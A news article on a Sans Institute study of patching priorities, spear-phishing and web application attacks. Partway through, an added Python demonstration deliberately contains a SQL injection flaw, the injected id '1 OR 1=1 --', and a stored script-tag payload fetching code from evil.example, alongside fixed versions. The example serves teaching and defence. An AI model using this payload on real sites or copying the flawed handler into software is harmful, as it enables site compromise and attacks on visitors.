
Businesses are prioritising unimportant security fixes while
leaving their IT systems open to sophisticated hacking attacks, a
major study released today reveals.
Analysis by US education and research body the
Sans Institute and leading
security firms shows that enterprises are concentrating their
resources on patching their operating systems.
But cyber-criminals are sidestepping the security measures by
using vulnerabilities in common applications such as Microsoft
Office and Adobe PDF reader to hack into company networks.
The study's findings will lead to a widespread reassessment of
how companies spend their IT security budget, said Alan Paller,
director of research at the Sans Institute.
"Enterprises are prioritising what is unimportant and delaying
fixing the main attack targets. I think the report will shift a lot
of money around in organisations because the findings are very hard
to ignore. Given the strength of the data, not acting would be
obvious negligence," he said.
The study is based on an analysis of attacks recorded by
intrusion prevention technology at 6,000 companies, and of security
vulnerabilities found in 9,000 organisations, by security suppliers
Tippingpoint and Qualys. It reveals that hackers have shifted to
spear-phishing attacks, targeted malicious e-mails whose attachments
or links exploit vulnerabilities in commonly used client programs, as
the primary form of attack against corporate systems.
Open to attack
Despite this, organisations are taking at least twice as long to
patch client-side vulnerabilities as they take to patch operating
system vulnerabilities: the risk the study ranks highest is getting
less attention than the one it ranks lowest.
The study also warns that organisations are failing to
adequately secure their public-facing websites, which it claims is
the second most significant source of attack with more than 60% of
internet attacks being directed against web applications.
Hackers are infecting popular websites with links to documents
that contain malicious embedded code, and are increasingly
targeting thousands of specialised websites with smaller
audiences.
By identifying and exploiting vulnerabilities in the content
management systems used by these sites, attackers can infect
thousands of sites in a matter of hours. Hackers are using
vulnerabilities such as SQL injection and Cross-Site Scripting to
convert trusted websites into malicious websites that serve attack
code to visitors: an injection flaw lets the attacker write script
tags into the stored page content, and the site then delivers that
script to every browser that loads the page.
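To make concrete what such a flaw looks like, and how it turns a trusted site into one that serves attacker script, here is an added example; it is not code from the report, the article or any named vendor. It uses Python's built-in sqlite3 module as a stand-in for a CMS database. The `pages` table, its three rows, the `evil.example` host and every function name are constructed for the illustration.

```python
"""
Added example: a SQL injection flaw in a CMS 'edit my page' handler lets an
attacker overwrite every stored page with a script tag, so the site itself
spreads attack code to visitors.  The fixed handler binds user input as data,
and the fixed renderer encodes stored content before emitting it.
All names, rows and hosts here are constructed for the example.
"""
import html
import sqlite3

# Hypothetical attacker payload; evil.example is an invented host name.
PAYLOAD = '<script src="http://evil.example/k.js"></script>'


def make_cms_db():
    """In-memory database with three constructed sample pages."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, author TEXT, body TEXT)")
    db.executemany(
        "INSERT INTO pages (id, author, body) VALUES (?, ?, ?)",
        [(1, "alice", "Welcome"), (2, "bob", "About us"), (3, "carol", "Contact")],
    )
    db.commit()
    return db


def update_page_vulnerable(db, author, page_id, body):
    """The handler as the attacker hopes to find it: the page id is spliced
    into the SQL text, so the WHERE clause is under attacker control.
    Returns the number of rows changed."""
    sql = ("UPDATE pages SET body = '%s' WHERE id = %s AND author = '%s'"
           % (body, page_id, author))
    cur = db.execute(sql)
    db.commit()
    return cur.rowcount


def update_page_safe(db, author, page_id, body):
    """Same handler with a parameterised query: the id is bound as a value,
    so an input like '1 OR 1=1 --' is compared against the id column as
    text and never reaches the SQL parser as syntax."""
    cur = db.execute(
        "UPDATE pages SET body = ? WHERE id = ? AND author = ?",
        (body, page_id, author),
    )
    db.commit()
    return cur.rowcount


def render_vulnerable(body):
    """Emits stored content straight into the HTML: stored XSS if the
    content was tampered with."""
    return "<div class=page>%s</div>" % body


def render_safe(body):
    """HTML-encodes stored content, so a tampered row is displayed as text
    rather than executed by the visitor's browser."""
    return "<div class=page>%s</div>" % html.escape(body, quote=True)


def infected_pages(db):
    """Defender-side check: ids of pages whose body now carries a script tag."""
    rows = db.execute("SELECT id FROM pages WHERE body LIKE '%<script%'").fetchall()
    return [r[0] for r in rows]


def demo():
    """Run the attack against both handlers and report what each allowed."""
    injected_id = "1 OR 1=1 --"   # attacker-supplied page id
    vuln_db = make_cms_db()
    changed_vuln = update_page_vulnerable(vuln_db, "alice", injected_id, PAYLOAD)
    safe_db = make_cms_db()
    changed_safe = update_page_safe(safe_db, "alice", injected_id, PAYLOAD)
    return {
        "vulnerable_rows_rewritten": changed_vuln,
        "vulnerable_infected_ids": infected_pages(vuln_db),
        "safe_rows_rewritten": changed_safe,
        "safe_infected_ids": infected_pages(safe_db),
    }


if __name__ == "__main__":
    print(demo())
```

With the vulnerable handler, an "author" who legitimately owns only page 1 rewrites all three pages in one request, and the comment marker strips the author check off the end of the query. The parameterised version changes nothing for the same input. Output encoding is the second, independent layer: if a row is altered by some other route, `render_safe` still shows the payload as inert text. The `infected_pages` query is the kind of check a site operator can run to find pages that have already been tampered with.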
The study shows there has been a significant increase in the
number of people discovering zero-day vulnerabilities, which have
no fixes available at the time of discovery, over the past three
years. Some vulnerabilities have remained unpatched for two
years.
But there is a shortage of skilled researchers working for
governments and software suppliers, leaving IT users at a
disadvantage against the hackers.
Key findings
- The vast bulk of the nation-state attacks against military,
defence industrial base and key commercial organisations throughout
the developed world are being executed using highly targeted
spear-phishing attacks.
- The vast bulk of new zombies (compromised computers enrolled in
botnets) are created when unsuspecting users visit trusted websites
that have themselves been infected.
- Both the spear-phishing and web attacks take advantage of
client-side vulnerabilities that are being given insufficient
attention by cyber defenders.
- The web attacks take advantage of web programming errors that
are not being picked up by common vulnerability scanners.